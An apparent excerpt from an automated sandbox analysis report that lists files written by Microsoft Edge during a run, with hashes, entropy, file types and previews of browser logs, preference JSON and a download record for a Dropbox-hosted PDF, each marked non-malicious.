                                                                                                                                                                                                                                                                                  SSDEEP:6:7iON+q2Pwkn23oH+TcwtpIFUt8Oi0XZmw+Oi3NVkwOwkn23oH+Tcwta/WLJ:7QvYfYebmFUt8OvX/+O2z5JfYebaUJ
                                                                                                                                                                                                                                                                                  MD5:9ECB7414AE1F02257DC8454BD69DB9C0
                                                                                                                                                                                                                                                                                  SHA1:BE1E69B4F913988D34CC21223964C2B083723EA9
                                                                                                                                                                                                                                                                                  SHA-256:E9F35B6AED4B4812FEACD909DC9793339A983BDBA17C68FAEE925FA516D2E3A8
                                                                                                                                                                                                                                                                                  SHA-512:41AFD1DA83F1631F430BB1DEC9DBA6A1782FC634EA9145ACB69E6311EA301C7044B53F509C47F788D01307C975059CEB747436AFE7B4D2A03A588C7ACF893106
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2024/12/10-12:41:28.692 1e68 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/10-12:41:28.694 1e68 Recovering log #3.2024/12/10-12:41:28.697 1e68 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 7, 1st free page 5, free pages 2, cookie 0x5, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.26707851465859517
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:TLPp5yN8h6MvDOH+FxOUwa5qVZ7Nkl25Pe2d:TLh8Gxk+6Uwc8NlYC
                                                                                                                                                                                                                                                                                  MD5:04F8B790DF73BD7CD01238F4681C3F44
                                                                                                                                                                                                                                                                                  SHA1:DF12D0A21935FC01B36A24BF72AB9640FEBB2077
                                                                                                                                                                                                                                                                                  SHA-256:96BD789329E46DD9D83002DC40676922A48A3601BF4B5D7376748B34ECE247A0
                                                                                                                                                                                                                                                                                  SHA-512:0DD492C371D310121F7FD57D29F8CE92AA2536A74923AC27F9C4C0C1580C849D7779348FC80410DEBB5EEE14F357EBDF33BF670D1E7B6CCDF15D69AC127AB7C3
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):131072
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0033311577667512224
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:ImtVui//l/VTZiltl:IiVui//I
                                                                                                                                                                                                                                                                                  MD5:CBAC11E5E60164AB58A7714BC2DB8B32
                                                                                                                                                                                                                                                                                  SHA1:2B244E5D79870B26BE613CD33109578548568093
                                                                                                                                                                                                                                                                                  SHA-256:A9FA476C08FCC3B3777D624F2BC647797848C8687468DE03F34F5D52A2EDC7A4
                                                                                                                                                                                                                                                                                  SHA-512:332486D331380CE0926728507C577C2A19DC38D8511C8ED11172D2053B39B66F53822134492FD97F8F7BCD9C417F1F7A27809F1C5AB12D5653EC08F4D831EBC3
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 89, cookie 0x66, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):184320
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0668736784556438
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:QSqzWMMUfTCnGCTjHbRJkkqtXaWTK+hGgH+6e7EHVumY7Zn6:QrzWMffmnzkkqtXnTK+hNH+5EVumO
                                                                                                                                                                                                                                                                                  MD5:139040ACC6995AED64F0CBC44A52D397
                                                                                                                                                                                                                                                                                  SHA1:6EF043C2BB9841CC0EC180DAD6CDABBF25DA1EBB
                                                                                                                                                                                                                                                                                  SHA-256:01646340D978022BFFB9023A0FE49C546A40DB87549C8877949418DDAEC856FA
                                                                                                                                                                                                                                                                                  SHA-512:0789934E73B9ACEFE4A07337327AAB0EB0EFDB44DA0C574C153C3DEF1608505E9AEC207D4EBE82762278B53259B5C359E3D3B70516F0AF6B477C34BF542E62BB
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2568
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.06462527237038727
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:09n/n3lE/PlC9e:0lvC/s8
                                                                                                                                                                                                                                                                                  MD5:E922268AEE33A79DA4489A8E4B27A3FC
                                                                                                                                                                                                                                                                                  SHA1:2776CBD04E6D6DAE4F48D187E45CF933A5976772
                                                                                                                                                                                                                                                                                  SHA-256:71837BDD927A0B294B08D3F1F65A9D0F6410494CA92C9128AF76C50DA596417F
                                                                                                                                                                                                                                                                                  SHA-512:6FCE970D58FCEA2D3A0D80C84888685F9B76457287AA135D0ED8EDD0C1C2690532AE7E081B1F4C2D3FEB9BA3E5DBF2C3CBCF1BEFFB86F25390334C29F891F3DB
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 7, cookie 0xb, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):14336
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.7836182415564406
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:LLqlCouxhK3thdkSdj5QjUsEGcGBXp22iSBgm+xjgm:uOK3tjkSdj5IUltGhp22iSBgm+xj/
                                                                                                                                                                                                                                                                                  MD5:AA9965434F66985F0979719F3035C6E1
                                                                                                                                                                                                                                                                                  SHA1:39FC31CBB2BB4F8FA8FB6C34154FB48FBCBAEEF4
                                                                                                                                                                                                                                                                                  SHA-256:F42877E694E9AFC76E1BBA279F6EC259E28A7E7C574EFDCC15D58EFAE06ECA09
                                                                                                                                                                                                                                                                                  SHA-512:201667EAA3DF7DBCCF296DE6FCF4E79897C1BB744E29EF37235C44821A18EAD78697DFEB9253AA01C0DC28E5758E2AF50852685CDC9ECA1010DBAEE642590CEA
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.41235120905181716
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB:v7doKsKuKZKlZNmu46yjx
                                                                                                                                                                                                                                                                                  MD5:981F351994975A68A0DD3ECE5E889FD0
                                                                                                                                                                                                                                                                                  SHA1:080D3386290A14A68FCE07709A572AF98097C52D
                                                                                                                                                                                                                                                                                  SHA-256:3F0C0B2460E0AA2A94E0BF79C8944F2F4835D2701249B34A13FD200F7E5316D7
                                                                                                                                                                                                                                                                                  SHA-512:C5930797C46EEC25D356BAEB6CFE37E9F462DEE2AE8866343B2C382DBAD45C1544EF720D520C4407F56874596B31EFD6822B58A9D3DAE6F85E47FF802DBAA20B
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):39660
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.562237912872127
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:768:myrZcH7pLGLPeEWPCkf7R8F1+UoAYDCx9Tuqh0VfUC9xbog/OVatiBfWLrwPYkpq:myrZcBcPeEWPCkf7Ru1jaLti5WAAknBm
                                                                                                                                                                                                                                                                                  MD5:E815B6827FA83C7F297A5ABA6B48E9CC
                                                                                                                                                                                                                                                                                  SHA1:DE475E1121A45E50380B0D4CA8A2B40C7EBFE0FB
                                                                                                                                                                                                                                                                                  SHA-256:6415B3C0A4C15A9BFAB6B7FE6E76A71656F7A33BADFD4B42494AFB29070E42F5
                                                                                                                                                                                                                                                                                  SHA-512:8BFE1FAF6B6B11D76CE09D6BC62625DC3B00366354393CBEE18B1637B40E174D703922F5B033B9F4FA4EE6D5485315BEF05C40473274670AF1510D38DAF0818E
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13378326088612821","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13378326088612821","location":5,"ma
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):11755
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                                  MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                                  SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                                  SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                                  SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):13066
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.153610680130476
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:sVeJ9pQTryZioouba4uyoJzG6IbY/3M8tpj+FVA1OHJj1f:sVeLAoxuJJzGgpUVGOHj
                                                                                                                                                                                                                                                                                  MD5:DECA78AB686BEE2191FF2066A10DCE00
                                                                                                                                                                                                                                                                                  SHA1:4CCBDE2C35E73A31253D070817D128B3FE7E904B
                                                                                                                                                                                                                                                                                  SHA-256:4A9431EDDA8435304A86617882C9DBC26DAAADEF39A1F0098044B6C7C2C82F3A
                                                                                                                                                                                                                                                                                  SHA-512:ACFB3ADA68075D64FAFFED385D999D6187172A4F10A764377370CA2DF03EC79AB788F84CA5FB45B9A60C395469E430D225D0DACCE65389854B9A833AEBBD5D93
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13378326089350309","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):37817
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.5558544420466465
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:768:myrZcH7pLGLPeEWPCkf7R8F1+UoAYDCx9Tuqh0VfUC9xbog/OV6BfWLrwPYkyDdY:myrZcBcPeEWPCkf7Ru1ja/5WAAkwBtM
                                                                                                                                                                                                                                                                                  MD5:9D5CCB1D4F8B8BC15AB72CDC8429EB43
                                                                                                                                                                                                                                                                                  SHA1:128E71046CF96C375CE19FF463A260BA211023E3
                                                                                                                                                                                                                                                                                  SHA-256:CC6EA5FA7D45AD4AD146FAA3709F4AB64F0B60952717F19F88C72A0883F478B7
                                                                                                                                                                                                                                                                                  SHA-512:7119C5089BA8645F10CE3D838C7C03308D0D3B878410CB8DBCDC75517CA12E6C3267237E3CAF07F516B62FE5758A2A0E0740DE799F452EECAB22CAE77CD52E17
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13378326088612821","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13378326088612821","location":5,"ma
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):9223
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.930079396307093
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13378326089350309","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":1023,"browser_content_container_width":1280,"browser_content_container_x":0,"browser_content_container_y":0,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 4, cookie 0x2, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):16384
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.35226517389931394
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.04597698982212379
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):49472
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.3021032768159063
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):3976
                                                                                                                                                                                                                                                                                  Entropy (8bit):6.079317047071047
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:...................021_download,44bf1c60-8c51-4680-a9a2-88f950ec14cf......$44bf1c60-8c51-4680-a9a2-88f950ec14cf................."...nhttps://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1...https://uc1d488445c67e91a5065449fe08.dl.dropboxusercontent.com/cd/0/get/CgDBoQi0xx9LrfNKbiBhRK2o5A90NugP4SzyD76WgsL8Uv2E3XrvNp-WD27q_ACUDD072v7-jemMeUbODu5Z4NJgGyrMZHNxCbk66wtc9B1kE5Hfwiu4dumWUuuQRuM5yGGy8zvi3r3PaO9WkT-HIZJn/file?dl=1#.."nhttps://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1*.0.B.1733684767914485dJ.P...Z.application/binaryb.application/binaryj.........r.........x....................................................................................... ..,U.................20_1_1...1f.7..................20_1_1...1.n..;...............#38_h.......6.Z..W.F.....i.T.....i.T.............D0................39_config..........6.....n ...12B.l...............2B.l...............B..\
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):281
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.171939370546379
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:73RhUyB1wkn23oH+Tcwtfrl2KLlp3uq2Pwkn23oH+TcwtfrK+IFUv:730FfYeb1LT3uvYfYeb23FUv
                                                                                                                                                                                                                                                                                  MD5:FAF8F402AA0182D0557A8D9B7F7434DD
                                                                                                                                                                                                                                                                                  SHA1:AFBEBA26B972812EB95E1FD345A0B619338B5A4C
                                                                                                                                                                                                                                                                                  SHA-256:43C8CE388F72DD2A41FFA6E7CE91C7DD2E9B090121DFB36935ED9A8C05BCCDA8
                                                                                                                                                                                                                                                                                  SHA-512:1EB28AEF31B052E962A26E70086A5D7C01377F77931D4047235DCF1091056CA3E74949C53B3B35DCBA51F3E230C580F52F1F2A50F1AB6BAE639AC62A763B6FF9
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2024/12/10-12:41:29.462 1eb0 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db since it was missing..2024/12/10-12:41:29.509 1eb0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):617
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.9325179151892424
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:G0nYUteza//z3p/Uz0RuWlJhC+lvBavRtin01zv0:G0nYUtezaD3RUovhC+lvBOL0
                                                                                                                                                                                                                                                                                  MD5:AD15D72AA4792C14DDD002CED70E8245
                                                                                                                                                                                                                                                                                  SHA1:30D0E75166FDA7126A73480EE3222C193231B579
                                                                                                                                                                                                                                                                                  SHA-256:17A781FB31D3176491D9B277ADEEE5521972C68956A2271637BBCBFEB27D6A7D
                                                                                                                                                                                                                                                                                  SHA-512:20B8D19B529A392FE0CBB44844926210D98C477498377B8370AA3A3A763C047EF96BE341686406522868EF848C83EF5EF4792B17CDD0462D4680EDA542C8A54F
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):299
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.122239041552267
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:73R+uivFB1wkn23oH+Tcwtfrzs52KLlp3Rsq2Pwkn23oH+TcwtfrzAdIFUv:73pivyfYebs9LT3evYfYeb9FUv
                                                                                                                                                                                                                                                                                  MD5:BE8613537AC15CD07C1DAADA596B8C85
                                                                                                                                                                                                                                                                                  SHA1:A1F4AF6DE2D19A73F0768A442B582238543E8133
                                                                                                                                                                                                                                                                                  SHA-256:56DE74916B40B1F9A898451E2DC67E1A0AFE99F2C4BD719E0490EE8938B214E3
                                                                                                                                                                                                                                                                                  SHA-512:84F04AFA44D47579B201C74FC2EA3AB3B96F4C047FB5AB65EC0B011F7C939159C94EF920DB957142EBD13C7832368E6C6903209E0F8DB81A4FEBC833AE252BB5
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2024/12/10-12:41:29.401 1eb0 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata since it was missing..2024/12/10-12:41:29.439 1eb0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
